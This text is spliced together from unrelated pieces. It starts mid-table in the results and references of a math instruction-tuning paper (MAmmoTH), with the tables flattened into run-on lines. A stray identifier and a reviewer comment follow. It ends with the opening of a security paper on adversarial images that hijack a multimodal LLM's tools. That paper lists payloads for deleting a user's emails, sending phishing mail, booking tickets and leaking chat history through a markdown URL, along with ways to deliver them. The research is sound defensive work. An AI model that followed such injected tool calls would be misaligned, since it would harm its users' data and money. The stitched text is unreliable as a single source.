| 74.4 | 64.5| | Δ | | | -5 | +19 | +14 | +19 | +16| Table 3: The table compiles all the in-domain evaluation results. Results marked as † are copied from other papers, which can be found on paperswithcode leaderboards. Math-SFT? means whether the model has been instruction-tuned on any math reasoning datasets. Pink numbers highlight the highest number within the corresponding scale and dataset. Note that there does not exist a 30B+ version for Llama-2 or a 70B version for Code-Llama. From Table 3, we can observe that our main competitors for IND datasets are WizardMath (Luo et al., 2023) and Platypus (Lee et al., 2023). WizardMath’s training is heavily rooted in GSM8K. | Model | SVAMP | Mathematics | SimulEq | SAT-Math | MMLU-Math | Avg | |----------------|-------|-------------|---------|----------|-----------|-----| | **Closed-source Model** | | | | | | | | GPT-4 | 97.0† | 60.8 | 83.1 | 95† | 74.9 | 82.1| | Codex (PoT) | 85.2† | - | - | 68† | - | - | | **7B Parameter Model** | | | | | | | | Llama-1 | 24.5 | 6.2 | 4.6 | 22.7 | 30.6 | 17.7| | Llama-2 | 34.5 | 6.0 | 5.0 | 26.8 | 29.8 | 20.4| | Code-Llama (PoT)| 49.4 | 21.7 | 3.5 | 28.6 | 26.9 | 26.0| | Llama-1 RFT | 21.1 | 5.1 | 11.0 | 12.5 | 21.7 | 14.3| | Galactica-6.7B | 25.6 | 4.6 | 4.2 | 17.5 | 28.0 | 16.0| | WizardMath | 36.1 | 9.3 | 12.8 | 25.4 | 31.1 | 28.6| | Toolformer | 29.4† | - | - | - | - | - | | MAmmoTH | 67.7 | 46.3 | 41.2 | 42.7 | 42.6 | 48.1| | MAmmoTH-Coder | 71.4 | 55.4 | 45.9 | 40.5 | 48.3 | 52.3| | Δ | +22 | +34 | +33 | +14 | +17 | +24 | | **13B Parameter Model** | | | | | | | | Llama-1 | 34.7 | 6.9 | 5.4 | 27.7 | 30.7 | 21.0| | Llama-2 | 35.1 | 11.5 | 5.8 | 32.7 | 34.4 | 23.9| | Code-Llama (PoT)| 60.0 | 21.3 | 3.8 | 25.9 | 27.7 | 27.7| | Vicuna-1.5 | 55.7 | 10 | 6.6 | 34.0 | 34.1 | 28.1| | Llama-1 RFT | 46.5 | 6.7 | 10.1 | 13.2 | 21.6 | 19.6| | WizardMath | 51.9 | 14.1 | 14.9 | 24.5 | 32.1 | 27.5| | Platypus | 55.4 | 11.4 | 7.4 | 36.8 | 35.5 | 29.3| | Orca-Platypus | 56.8 | 12.6 | 7.9 | 29.5 | 41.6 | 29.7| | MAmmoTH | 72.4 | 49.2 | 43.2 | 46.8 | 47.6 | 51.8| | MAmmoTH-Coder | 73.7 | 61.5 | 47.1 | 48.6 | 48.3 | 55.8| | Δ | +14 | +40 | +33 | +12 | +7 | +26 | | **30-34B Parameter Model** | | | | | | | | Llama-1 | 48.8 | 12.8 | 11.2 | 33.4 | 39.0 | 29.0| | Code-Llama (PoT)| 69.1 | 34.5 | 6.8 | 26.8 | 21.6 | 31.7| | Llama-1 RFT | 55.4 | 7.6 | 12.8 | 20.4 | 37.9 | 26.8| | Galactica-30B | 41.6 | 11.8 | 13.2 | 37.7 | 37.9 | 28.4| | Tulu | 59.0 | 10.7 | 10.3 | 31.3 | 39.8 | 30.2| | Platypus | 51.7 | 13.8 | 13.6 | 38.6 | 41.0 | 31.7| | MAmmoTH-Coder | 84.3 | 65.4 | 51.8 | 60.9 | 53.8 | 63.2| | Δ | +15 | +31 | +38 | +22 | +13 | +32 | | **65-70B Parameter Model** | | | | | | | | Llama-1 | 55.3 | 14.2 | 15.2 | 37.4 | 44.1 | 33.2| | Llama-2 | 63.8 | 20.5 | 14.0 | 51.3 | 47.1 | 39.3| | Llama-2-Chat | 71.5 | 19.2 | 21.7 | 44.1 | 46.9 | 40.6| | WizardMath | 71.8 | 17.1 | 37.9 | 13.2 | 27.4 | 33.4| | Guanaco | 66.8 | 17.8 | 20.2 | 50.0 | 47.3 | 40.4| | Platypus | 51.8 | 26.3 | 21.7 | 55.9 | 52.5 | 41.6| | MAmmoTH | 82.4 | 55.6 | 51.4 | 66.4 | 56.7 | 62.5| | Δ | +11 | +29 | +14 | +11 | +4 | +21 | Table 4: The table compiles all the out-of-domain evaluation results. Results marked as † are copied from other papers, which can be found on paperswithcode leaderboards. and MATH datasets. Therefore, WizardMath’s results are highly competitive on these two datasets. However, the dataset-specific training can be detrimental to OOD datasets like AQuA. In contrast, Platypus fine-tunes LLMs on a wide range of text and math reasoning datasets. It improves the open-source SoTA on several datasets. Similarly, MAmmoTH can achieve universal improvement across the board. A major observation is that MAmmoTH is particularly strong at solving more complex math problems in MATH, where the gain of our model over WizardMath (open-source SoTA on MATH) can exceed 25% at different scales. Figure 2: Investigation of the influence of CoT & PoT hybrid training on the 7B Llama-2 model. “Out-of-domain” refers to the five datasets detailed in Table 2. Key insights include: 1) The SoTA model, utilizing dataset-specific CoT fine-tuning on GSM and MATH, displays strong performance within its domains but struggles in OOD scenarios; 2) Diverse data sources in MathInstruct enable better math generalist model; 3) Fine-tuning on the PoT subsets generally outperforms fine-tuning on the CoT subsets; 4) Hybrid training yields the best-performing model. The breakdown results on each dataset can be found in Appendix Table 9. From Table 4, we can observe that our main competitor for OOD datasets is Platypus (Lee et al., 2023). Similar to in-domain results, Platypus is able to yield gains over the baseline models universally across the board, especially on the MMLU-Math dataset, which is tied with MAmmoTH-70B. It is worth noting that the performance gains of our model on OOD datasets are even more significant than on in-domain datasets. This demonstrates our models’ remarkable generalizability to unseen math problems. Notably, MAmmoTH-7B also boosts the CoT performance of WizardMath-7B greatly on MMLU-Math by 9%, which contains a substantial number of questions beyond the subjects we covered in our training dataset. Comparison between Different Base Models. In our experiments, we experimented with both Llama-2 and Code-Llama as the base models. From the two tables, we can observe that Code-Llama is consistently better than Llama-2, especially on OOD datasets. The gap between MAmmoTH and MAmmoTH-Coder can even reach up to 5%. Surprisingly, the average performance on OOD datasets of MAmmoTH-Coder (34B) is actually higher than MAmmoTH (70B). We believe MAmmoTH-Coder benefits greatly from the continuous code training of Code-Llama, which not only enhances the PoT capabilities but also improves Llama’s general reasoning skills. 3.4 Ablation Study on Data Source Ablation of the Data Source. In order to better understand what factors contribute to the great gain of MAmmoTH over existing baselines, we set up a group of control experiments in Figure 2. We study the following setups: (1) MAmmoTH (MathInstruct - CoT): This experiment aims to understand how much our curated CoT data could improve the generalization over the SoTA model WizardMath (Luo et al., 2023) trained specifically on GSM + MATH. As can be seen, while sacrificing accuracy on GSM + MATH by 3%, our CoT subset fine-tuning improves the overall nine-dataset accuracy from 27% to 32%. (2) MAmmoTH (MathInstruct - PoT): This experiment aims to understand the advantage of our PoT subset. As can be observed, our PoT subset fine-tuning can significantly improve the overall accuracy from 27% to 41%. This ablation reflects the importance of unlocking the program generation capabilities of our model. (3) MAmmoTH (MathInstruct - Hybrid): We further combine CoT and PoT as the hybrid training data to achieve the best overall performance of 47.9%. This combined gain comes from two aspects: • The CoT subset helps maintain generic language-based reasoning skills to handle scenarios where PoT cannot handle well, e.g., abstract reasoning multi-choice questions in AQuA and MMLU. • The PoT subset can teach the model how to utilize Python APIs to solve complex math problems with high precision, e.g., the MATH problems requiring complex computation. | Training Data | GSM | MATH | AQuA | NumG | SVA | Mat | Sim | SAT | MMLU | AVG | |---------------|-----|------|------|------|-----|-----|-----|-----|------|-----| | - | 14.6| 2.5 | 30.3 | 29.9 | 34.5| 6.0 | 5.0 | 26.8| 29.8 | -25.3| | G | 56.6| 9.2 | 24.4 | 32.1 | 65.4| 20.5| 12.3| 27.2| 25.2 | 30.3 | | M | 27.1| 25.5 | 27.8 | 32.1 | 47 | 49.4| 10.5| 26.4| 27.4 | 30.4 | | A | 15.3| 5.8 | 39.7 | 15.5 | 15.3| 6.3 | 7.2 | 32.7| 36.6 | 19.4 | | G + M | 58.1| 28.2 | 26.0 | 34.7 | 64.8| 50.1| 17.1| 28.6| 28.4 | 37.3 | | G + M + T | 56.5| 26.5 | 27.4 | 35.5 | 64.4| 50.6| 18.8| 29.1| 29.1 | 37.5 | | G + M + C | 57.4| 28.5 | 26.2 | 37.5 | 65.3| 50.4| 17.7| 29.3| 28.7 | 37.9 | | G + M + A | 56.1| 27.1 | 37.8 | 37.2 | 64.8| 48.2| 19.8| 35.4| 39.8 | 40.7 | | G + M + C + A | 57.5| 29.1 | 46.9 | 42.2 | 65.8| 49.6| 32.7| 42.3| 43.1 | 45.5 | | M + C + A + N | 24.7| 26.1 | 39.4 | 59.7 | 61.6| 48.6| 43.4| 36.4| 41.2 | 42.3 | | G + M + C + N | 50.8| 26.2 | 20.9 | 65.5 | 65.8| 48.5| 41.4| 26.4| 24.7 | 41.1 | | G + C + A + N | 51.3| 14.8 | 41.7 | 58.8 | 66.3| 31.0| 42.2| 34.1| 40.5 | 42.3 | | G + M + C + A + T | 55.4| 28.6 | 42.5 | 44.9 | 65.4| 50.8| 34.9| 41.3| 42.5 | 45.1 | | G + M + C + A + N | 56.5| 28.9 | 38.2 | 63.7 | 64.1| 47.9| 40.8| 38.6| 44.5 | 47.0 | | G + M + C + A + N + T | 53.8| 27.0 | 38.2 | 60.8 | 65.9| 50.8| 41.8| 42.5| 42.7 | 47.1 | | G + M + C + A + N + MQA | 55.7| 28.8 | 42.5 | 62.1 | 64.6| 45.9| 38.9| 41.3| 45.0 | 47.2 | | MathInstruct | 53.6| 31.5 | 44.5 | 61.2 | 67.7| 46.3| 41.2| 42.7| 42.6 | 47.9 | Table 5: Influence of different major subsets in MathInstruct based on Llama-2 7B. G: GSM8K, M: MATH, C: Camel, A: AQuA, N: NumGLUE, MQA: MathQA. “Existing data”: the subset of MathInstruct in Table 1 by excluding all the NEW rationales curated by us. We shorten Mathematics as Mat, SimulEq as Sim, NumGLUE as NumG, and SVAMP as SVA to save space. We put some case studies in Appendix B to demonstrate the respective advantages of PoT and CoT in solving different types of math problems. To summarize, we attribute our substantial gain to: 1) diverse data sources covering different math fields and complexity levels and 2) a hybrid of CoT & PoT instruction tuning and decoding strategy. **Influence of Major Subsets.** Given the diverse sources of MathInstruct used in training MAmmoTH, it is important to understand how each dataset contributes to the overall performance of the model. We focus on five significant subsets: GSM8K, MATH, Camel, AQuA, and NumGLUE. We conduct an experiment gradually adding each dataset into training and compare the performance with the one fine-tuned on the whole MathInstruct. These results underscore the significant impact of diverse data sources on MAmmoTH performance, a core aspect of making MAmmoTH a math generalist. The results also provide valuable insights for future data curation and collection efforts (e.g., we should always collect diverse data and avoid collecting only specific types of data). To help understand the contribution of the 6 newly curated datasets as shown in Table 1, we remove them from MathInstruct, and train a model on the existing data. As shown in the last two rows of Table 5, our new curated data substantially improves the performance on many datasets and leads to a 9% overall increase, which reflects the importance of the NEWLY curated dataset. **Influence of Hybrid Decoding.** To demonstrate the effectiveness of the hybrid decoding method, we conduct an experiment as outlined in subsection 2.3. By default, we initially attempt the PoT decoding method for a given question. If it fails to generate an executable query, we then transition to the CoT decoding method. The performance of different decoding methods (CoT, PoT, and Hybrid) is shown in Table 10. This hybrid decoding improves performance on every test set, showcasing that our model can effectively leverage the strengths of both CoT and PoT decoding strategies. ## 4 Conclusion In this paper, we propose a novel math instruction tuning approach to activate open-source LLMs’ mathematical reasoning capabilities. Through a comprehensive study, we show that our models can outperform the SoTA performance at different scales by a huge margin. Our models benefit massively from: 1) the broad coverage of different math fields and complexity levels, and 2) a hybrid of CoT and PoT training. Our instruction tuning dataset contains 260K samples, which makes fine-tuning highly affordable even for academic labs. Our work paves the road for future studies to activate LLMs’ core capabilities in specialized domains. REFERENCES Aida Amini, Saadia Gabriel, Shanchuan Lin, Rik Koncel-Kedziorski, Yejin Choi, and Hannaneh Hajishirzi. MathQA: Towards interpretable math word problem solving with operation-based formalisms. In Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long and Short Papers), pp. 2357–2367, 2019. doi: 10.18653/v1/N19-1245. URL https://aclanthology.org/N19-1245. Rohan Anil, Andrew M Dai, Orhan Firat, Melvin Johnson, Dmitry Lepikhin, Alexandre Passos, Siamak Shakeri, Emanuel Taropa, Paige Bailey, Zhifeng Chen, et al. Palm 2 technical report. ArXiv preprint, abs/2305.10403, 2023. URL https://arxiv.org/abs/2305.10403. Yuntao Bai, Saurav Kadavath, Sandipan Kundu, Amanda Askell, Jackson Kernion, Andy Jones, Anna Chen, Anna Goldie, Azalia Mirhoseini, Cameron McKinnon, et al. Constitutional ai: Harmlessness from ai feedback. ArXiv preprint, abs/2212.08073, 2022. URL https://arxiv.org/abs/2212.08073. Mark Chen, Jerry Tworek, Heewoo Jun, Qiming Yuan, Henrique Ponde de Oliveira Pinto, Jared Kaplan, Harri Edwards, Yuri Burda, Nicholas Joseph, Greg Brockman, et al. Evaluating large language models trained on code. ArXiv preprint, abs/2107.03374, 2021. URL https://arxiv.org/abs/2107.03374. Wenhui Chen, Xueguang Ma, Xinyi Wang, and William W Cohen. Program of thoughts prompting: Disentangling computation from reasoning for numerical reasoning tasks. ArXiv preprint, abs/2211.12588, 2022. URL https://arxiv.org/abs/2211.12588. Wenhui Chen, Ming Yin, Max Ku, Elaine Wan, Xueguang Ma, Jianyu Xu, Tony Xia, Xinyi Wang, and Pan Lu. Theoremqa: A theorem-driven question answering dataset. ArXiv preprint, abs/2305.12524, 2023. URL https://arxiv.org/abs/2305.12524. Hyung Won Chung, Le Hou, Shayne Longpre, Barret Zoph, Yi Tay, William Fedus, Eric Li, Xuezhi Wang, Mostafa Dehghami, Siddhartha Brahma, et al. Scaling instruction-finetuned language models. ArXiv preprint, abs/2210.11416, 2022. URL https://arxiv.org/abs/2210.11416. Karl Cobbe, Vineet Kosaraju, Mohammad Bavarian, Mark Chen, Heewoo Jun, Lukasz Kaiser, Matthias Plappert, Jerry Tworek, Jacob Hilton, Reiichiro Nakano, et al. Training verifiers to solve math word problems. ArXiv preprint, abs/2110.14168, 2021. URL https://arxiv.org/abs/2110.14168. Alex Davies, Petar Veličković, Lars Buesing, Sam Blackwell, Daniel Zheng, Nenad Tomašev, Richard Tanburn, Peter Battaglia, Charles Blundell, András Juhász, et al. Advancing mathematics by guiding human intuition with ai. Nature, 600(7887):70–74, 2021. URL https://www.nature.com/articles/s41586-021-04086-x. Tim Dettmers, Artidoro Pagnoni, Ari Holtzman, and Luke Zettlemoyer. Qlora: Efficient finetuning of quantized llms. ArXiv preprint, abs/2305.14314, 2023. URL https://arxiv.org/abs/2305.14314. Andrew Drozdov, Nathanael Schärli, Ekin Akyürek, Nathan Scales, Xinying Song, Xinyun Chen, Olivier Bousquet, and Denny Zhou. Compositional semantic parsing with large language models. International Conference on Learning Representations (ICLR), 2023. URL https://openreview.net/forum?id=gJW8hSGBys8. Luyu Gao, Aman Madaan, Shuyan Zhou, Uri Alon, Pengfei Liu, Yiming Yang, Jamie Callan, and Graham Neubig. Pal: Program-aided language models. In International Conference on Machine Learning, pp. 10764–10799. PMLR, 2023. URL https://proceedings.mlr.press/v202/gao23f/gao23f.pdf. Zhibin Gou, Zhihong Shao, Yeyun Gong, Yelong Shen, Yuju Yang, Nan Duan, and Weizhu Chen. Critic: Large language models can self-correct with tool-interactive critiquing. ArXiv preprint, abs/2305.11738, 2023. URL https://arxiv.org/abs/2305.11738.
djcciHhCrt
Additionally, the authors claim that the attack is stealthy because it does not alter the semantic meanings of the output answers. They support this claim with the evidence that the answers under attack are 10% less natural compared to the original ones. My question is, why is a 10% difference considered a small one?
MISUSING TOOLS IN LARGE LANGUAGE MODELS WITH VISUAL ADVERSARIAL EXAMPLES Anonymous authors Paper under double-blind review ABSTRACT Large Language Models (LLMs) are being enhanced with the ability to use tools and to process multiple modalities. These new capabilities bring new benefits and also new security risks. In this work, we show that an attacker can use visual adversarial examples to cause attacker-desired tool usage. For example, the attacker could cause a victim LLM to delete calendar events, leak private conversations and book hotels. Different from prior work, our attacks can affect the confidentiality and integrity of user resources connected to the LLM while being stealthy and generalizable to multiple input prompts. We construct these attacks using gradient-based adversarial training and characterize performance along multiple dimensions. We find that our adversarial images can manipulate the LLM to invoke tools following real-world syntax almost always (~98%) while maintaining high similarity to clean images (~0.9 SSIM). Furthermore, using human scoring and automated metrics, we find that the attacks do not noticeably affect the conversation (and its semantics) between the user and the LLM. 1 INTRODUCTION Conversational Large Language Models (LLMs) exhibit state-of-the-art performance on tasks that require natural language understanding, reasoning, and problem-solving. To enhance their capabilities, model developers have begun augmenting LLMs with third-party extensions, tools, and plugins (OpenAI, 2023a; Rajesh Jha, 2023; AutoGPT, 2023; Yury Pinsky, 2023) and also with the ability to understand images and sound (OpenAI, 2023d). Furthermore, frameworks like LangChain (LangChain, 2023) and Guidance (Microsoft, 2023a) facilitate development of such integrations. These enhanced LLMs can retrieve up-to-date information from the Internet and achieve more complex tasks such as flight reservations and email management. Unfortunately, these multimodal tool-enhanced LLMs face new security threats with the broadened resources and privileges they can access — a misbehaving model now has the potential to affect user resources that are integrated with the LLM. For example, the LLM is able to delete a user’s calendar, email sensitive conversation history to the attacker, or cause financial harm to the user by booking hotels. We observe that such problems are more security-relevant (i.e., having real impacts on the confidentiality and integrity of user resources) compared to other widely-discussed vulnerabilities such as “jailbreaking” (i.e., an LLM producing content that violates broadly accepted human values). A growing line of work has started exploring attacks on LLMs. For example, textual prompt-injection attacks manipulate the LLM to exfiltrate user data or call integrated tools in ways that are inconsistent with user expectations (Greshake et al., 2023; Samoilenko, 2023). These works embed malicious text instructions on the web, hoping that an unsuspecting user might simply ask the LLM to summarize an attacker-controlled webpage and cause the LLM to accidentally ingest and operate on those instructions. Such attacks are security-relevant but are not stealthy — a security-conscious user can detect the presence of unrelated instructions by examining the prompt history. Another line of work uses gradient information to compute adversarial examples (Bagdasaryan et al., 2023; Zou et al., 2023) attacking specific prompts. For instance, Bagdasaryan et al. (2023) show that when the user enters a pre-defined prompt (e.g., “describe the image”) together with the adversarial image, a multimodal LLM will output attacker-specified text (e.g., “From now on I will 1For brevity, we refer to all three categories as “tools” in the rest of this paper. always mention the word: cow”). This style of attack only works for the specific prompt they are optimized on, but not for any other general user inputs. It is also not stealthy because the response of the LLM is unexpected. Carlini et al. (2023) and Qi et al. (2023) also show that adversarial images can successfully bypass model alignment, achieving jailbreak. Although the prior works demonstrate that attacking non-text modality can be destructive to the language model, none of them are security-relevant because user resources are unaffected. However, it does show the potential of utilizing non-text modalities to stealthily embed malicious instructions that could manipulate a user’s external resources. Motivated by the above discussion, we observe the following gap — existing attacks are not security-relevant and stealthy. Our work closes the gap in the attack space by proposing a white-box image-based attack against multimodal LLMs. Attackers can craft trojan-like images that instruct the victim LLM to invoke some attacker-specified tools or external API calls. Commercial LLMs like ChatGPT (OpenAI, 2023a) and Google Bard (Yury Pinsky, 2023) invoke the integrated tools by detecting if the model responses with specific syntax format of the tools. Once they pass format check, they will be directly processed as function calls. Figure 1 presents an example of our attack that simulates real-world scenarios. We observe that the adversarial image looks normal and the conversation remains reasonable and natural across different user inputs. Also, observe that the attack “harms” the user by abusing the email tool. Specifically, our attack has the following properties: - **Tools-abusing:** The attack manipulates the LLM into taking sensitive actions on a user’s resources (e.g., deleting a user’s mailbox) by invoking integrated tools in complex and non-natural-language syntax precisely. This makes it security-relevant. - **Stealthy:** A security-conscious user examining the input prompt will not be able to easily determine whether an attack can occur because the image has imperceptible perturbations. Furthermore, the attack remains stealthy after the LLM ingests the prompt because the attack maintains response utility (i.e., the conversation between the user and the LLM remains reasonable, natural, and indistinguishable from conversations when no attack is present). - **Generalizable:** The attack works across different prompts that can be both, related and unrelated to the image. This is important because in the real world, a prompt is under the user’s control. An attack should not assume specific prompts. We observe that our attack does not violate safety alignment. Using tools/plugins is a natural and expected behavior of LLMs. Our work also highlights an important shortcoming in current definitions of alignment — most current efforts focus on broadly applicable human values. Yet, user- and task-specific misalignment can occur through attacks like ours. Detecting and preventing such misalignment requires fine-grained information about a specific user’s intentions that is typically unavailable during alignment efforts using current techniques e.g., RLHF (Stiennon et al., 2020). Table 1: Different variants of attacks and the corresponding tool invocation syntaxes. Note that in the last attack, the string in red is not fixed but a copy of the user prompt history. We have taken these syntax examples from real-world systems that integrate LLMs with tools. | Attack Objective | Target Tool Invocation Instruction | |------------------|-----------------------------------| | delete_email | <function.delete_email which="all"> | | send_email | <function.send_email input="I wish you a merry Christmas!" to="[email protected]"> | | send_email_hard | <function.send_email_hard input="Free Costco Membership, click here https://tinyurl.com/nhyd8rb4" to="[email protected]"> | | book_ticket | REQUEST TO EXPEDIA { "user_input_in_english": "Book a ticket from San Diego to Seattle on October 25", "keywords": "book|ticket|san diego|seattle|october 25", "origin": "San Diego", "destination": "Seattle", "departure_date": "2023-10-25" } | | md_url_query | ![a](https://tinyurl.com/nhyd8rb4?p=How%20far %20is%20Earth%20from%20the%20Moon) | To achieve the aforementioned properties of our attack, we adopt traditional gradient-based adversarial training (Goodfellow et al., 2014) that optimizes the adversarial image in a continuous space. First, we design a training loss that decomposes the generation objective in order to maintain normal conversation responses while injecting malicious tool usage. We also incorporate an image regularization term to control the adversarial image quality. This novel loss function balances between image and response stealthiness and success rate on making function calls/tool invocations. Second, we construct prompt-response training pairs to enable attack generalization to unseen prompts. We query GPT-4 to generate image-related questions and acquire image-unrelated questions from the Alpaca instruction dataset (Taori et al., 2023), and obtain responses from the target model. Contributions. (1) We propose a stealthy, security-relevant white-box attack that causes multimodal LLMs to invoke attacker-desired tools. These attacks have real impacts on the confidentiality and integrity of user resources. These attacks close a gap in the literature relating to realistic attacks on LLMs. (2) We characterize the performance of this attack using both human-based and automated metrics for stealthiness and success rates (see details in Section 4). 2 SYSTEM AND THREAT MODEL The attacker targets a user and their victim LLM that is integrated with tools. The LLM is trained to generate text following specific tool invocation syntax with arguments it infers from the user. A framework wrapping the LLM will proactively scan the model outputs and execute the tool accordingly when a syntax match is found (e.g., ChatGPT, Microsoft Semantic Kernel). This segment of text for tool invocation will not be printed out and is unseeable by users. We assume that the user and the victim LLM are benign, similar to Greshake et al. (2023); Samoilenko (2023). Note that this setting is distinct from attacks where the users are malicious such as Zou et al. (2023) and Maus et al. (2023). The attacker’s motivation is to manipulate the confidentiality and integrity of user resources that are connected to the LLM. For example, the attacker could cause financial harm to a user by reserving hotels or could delete user data. We further assume that the attacker has white-box access to the (weights of) victim LLM. This assumption is reasonable as there are a range of open-source LLMs (e.g., LLama, Vicuna, StarCoder). Furthermore, recent work has demonstrated the black-box transferability of attacks to open-source models (Qi et al., 2023; Zou et al., 2023) and also closed models like GPT and Bard (Zou et al., 2023). While we do not examine the transferability of our attacks, we observe that it is important future work. There are several methods to deliver the attack to the user. For example, the attacker may share the adversarial image on social media and lure users to play with it e.g., “Try "Describe this image" on your LLM” or they may embed the adversarial image in webpages that could be read by LLM accidentally while browsing the Internet. At this point, the attack image is injected into the victim LLM. A successful attack must achieve the attacker-desired tool abuse and must also satisfy the following properties to be disguised enough for a long-lasting spread: (1) Stealthy, the image appears benign to a human and the conversation should have good response utility (i.e., the conversation with the attack present should remain reasonable and natural, and indistinguishable from clean conversations with humans) and (2) Generalizable, the attack should work across a range of input prompts. More related work is discussed in Appendix A.1. 3 ADVERSARIAL IMAGE OPTIMIZATION The goal of our attack is to find an adversarial image that can stealthily trigger attacker-desired malicious tool invocation while being able to generalize to any prompt that a user might provide. Our attack uses the insight that in a multimodal LLM, the image prompt is vulnerable to gradient-based adversarial training that optimizes in continuous space (Goodfellow et al., 2014). In this section, we discuss the design of the training objective that balances stealthiness and attack success rate. In Section 4.1, we discuss how to construct a prompt-response training set to achieve the generalization property of our attack. 3.1 ATTACK VARIANTS We consider five attacks with distinct attack objectives corresponding to five different levels of complexity in terms of the required instructions for tool invocation. We list the details of these attack objectives in Table I and we are using exactly the same function call syntax that commercial LLMs are using. For the first three attack objectives i.e., delete_email, send_email, send_email_hard, the invocation instructions have similar syntax (same prefix and keyword arguments) but with an increasing number of non-natural-language texts required, which indicates an increasing difficulty in producing these attacks in our assumption. The instructions here follow the function call syntax specified by Microsoft (2023b). For the fourth attack objective book_ticket, the instruction is a more complicated JSON with many special characters in syntax and is more challenging. This instruction follows the call syntax of ChatGPT to the Expedia plugin OpenAI (2023b). For the last attack objective md_url_query, the instruction involves a component (the query string in the URL) that is a copy and URL-encoded version of the previous user inputs representing the conversation history. Such copy and encoding behavior is extremely difficult for the LLM to produce, making it the most challenging out of these five. The syntax here follows a standard markdown image href that is supported by ChatGPT natively, as inspired by Samoilenko (2023). 3.2 ATTACK OBJECTIVE As shown in Figure 2, our attack targets mainstream off-the-shelf multimodal LLMs that respond with text or intrinsic instructions for tool invocation based on text and image prompts. Let $M$ denote the LLM, $\{c, x, y\}$ represents an input-output tuple. Generally, $M$ takes the input of a text prompt $c$, image $x$ and outputs a response sequence $y = M(c, x)$ through a search algorithm (e.g. beam search or sampling) based on the trained probabilistic model. The attack goal is to train a small perturbation $\delta$ to apply to the original image so that the model generates certain outputs specified by the attacker, namely, gives a desired output $y' = M(c, x + \delta)$. To camouflage our attack, $y'$ is constructed by the concatenation of the normal response $y$ and $y_{adv}$, a malicious instruction that the attacker intends to trigger. Generally speaking, the training objective can be written as minimizing the negative log probability of generating target $y'$, parameterized by model weights $\theta$: $-\log P_\theta(y'|c, x + \delta)$. 3.3 ATTACK STEALTHINESS TRADE-OFF The stealthiness of our attack is two-fold: (1) the attack image should look similar to the original one and, (2) apart from the attack payload for tool invocations, the text response should otherwise be a reasonable reply to the prompt. Intuitively, achieving stealthiness inevitably harms the attack success rate. So we introduce how the trade-off is performed in our objective function. Figure 2: Overall architecture of our attack method. We train the targeted image using gradient-based optimization, and separate the loss term into three components, aiming at keeping perturbations imperceptible, maintaining response utility, and achieving malicious behavior respectively. To ensure the quality of the adversarial image, $\delta$ needs to be as small as possible. We apply an additional $l_2$ normalization term to the objective, which is technically equivalent to the Projected Gradient Descent attack (Madry et al., 2017) that projects the gradient term onto an $L_p$ norm boundary. Note that the $l_2$ norm of $\delta$ is computed with regard to each color channel separately and is controlled by $\lambda_i$. The objective of adversarial training is then written as: $$\min_{\delta} - \log P_\theta(y' | c, x + \delta) + \lambda_i ||\delta||$$ In the current loss function, we are using a hard target of $y' = [y; y_{adv}]$ to ensure response stealthiness. It is challenging because $y_{adv}$ is mainly non-natural syntax and forcing the output to contain exactly the normal response $y$ can make convergence difficult or can harm the stealthiness of $\delta$. In real-world conversational systems, users will tolerate various responses to their prompts as long as they seem natural and reasonable. However, users can easily sense something is wrong if the injected malicious instruction cannot fully comply with the format of function calls. This failure will make the attack tokens appear in the rendered model response. To minimize the chances of this happening, we reduce the contribution of the loss term corresponding to $y$ (i.e., the normal response to the user’s prompt). We modify (1) and weigh the cross entropy loss for $y$ and $y_{adv}$ separately as: $$\min_{\delta} - \log P_\theta(y_{adv} | y, c, x + \delta) - \lambda_r \log P_\theta(y | c, x + \delta) + \lambda_i ||\delta||.$$ In the equation, the log probability of generating the adversarial instruction $y_{adv}$ is conditioned on both the prompt and the normal response. We use $\lambda_r$ to control the trade-off of the supervision from the ground truth response. We summarize the architecture of our attack in Figure 2. Training Details. To effectively train $\delta$ so that it can be generalized to all of the text prompt sequences, we create a training dataset $D$ containing multiple pairs of $\{(c_j, y_j)\}$, where $y_j$ is the normal response of $M$ given prompt $c_j$ and $x$. The objective is to optimize all the prompts jointly: $$\min_{\delta} \frac{1}{|D|} \sum_j (- \log P_\theta(y_{adv} | [c_j; y_j], x + \delta) - \lambda_r \log P_\theta(y_j | c_j, x + \delta)) + \lambda_i ||\delta||.$$ We introduce the details of how we construct $D$ in Section 4.1. We adopt Adam optimizer (Kingma & Ba, 2014) to solve the optimization problem for acceleration and better results. The learning rate of the optimizer is denoted as $\alpha$ and tuned in our experiments, while the other hyperparameters in the optimizer are left as default ($\beta_1 = 0.9$ and $\beta_2 = 0.999$). 4 EVALUATION To evaluate the attack, we need to measure how well it generates tool invocation syntax according to the attacker’s intentions (success rate for different attack variants), the stealthiness of the attack (both image stealthiness and response utility), and the generalization of the attack to unseen prompts. We test the attack on an open-sourced multimodal LLM — LLaMA Adapter (Zhang et al., 2023). In brief, LLaMA Adapter encodes an image into a sequence of representations, which are treated as tokens and appended to the text input, such that token generation would be conditioned on the image. From now on, we refer to LLaMA Adapter as the model. Note that our attacks are only applied to the image part of the input prompt. For our attack method, we set $\alpha = 0.01$, $\lambda_i = 0.02$, $\lambda_r = 1.0$ and train for 12000 steps with a batch size of 1. Details on how the numbers are picked are in Appendix A.6. We observed significant randomness during adversarial image training. In some cases, different trials (where the only difference is the random seed) can lead to an almost perfect attack and a completely failed attack. Therefore, for all experiments, we report the best result among three trials since attackers can test the performance themselves and always present the best-performing image in public to lure users to use. We apply our attack method to three different base images to demonstrate the robustness of our attack across various images. Image sources and preprocessing details are in Appendix A.2. 4.1 Dataset Construction To evaluate the generalizability of our attack, we create prompt datasets for training and evaluation independently under two categories: (1) prompts that are related to images (image-related) and (2) prompts that are unrelated to images (image-unrelated). For training, the image-related prompts are obtained by querying GPT-4 with the prompt: “Generate 100 questions related to an image”. These questions are applicable to any general image, but the responses should be varied and specific to each image. The image-unrelated prompts are the first 3200 questions in the Alpaca instruction following dataset (Taori et al., 2023). For testing, we consider an in-domain generalization setup where the image-related prompts are created by a human volunteer instructed to create 50 different prompts similar to the prompts in the training set and the image-unrelated prompts are a disjoint set of 100 questions in the Alpaca dataset. Additionally, to test out-domain generalization, we create an out-domain test set. For the image-related prompts, we first generate a textual summary of the image through Bard, and then prompt GPT-4 with the summary and ask it to generate 50 questions given the image summary. Note that the questions for each image would be different in this case. For the image-unrelated prompts, we prompt GPT-4 to generate 50 general questions. Note that for the instructions from the Alpaca dataset, we omit prompts that contain an input section, and prompts that are too long, to keep most generations under a reasonable length of 128 tokens to speed up training. This leaves us 1803 out of 3200 image-related prompts for training, and 64 out of 100 image-unrelated prompts for evaluation. Since the training set size of unrelated prompts is much larger than 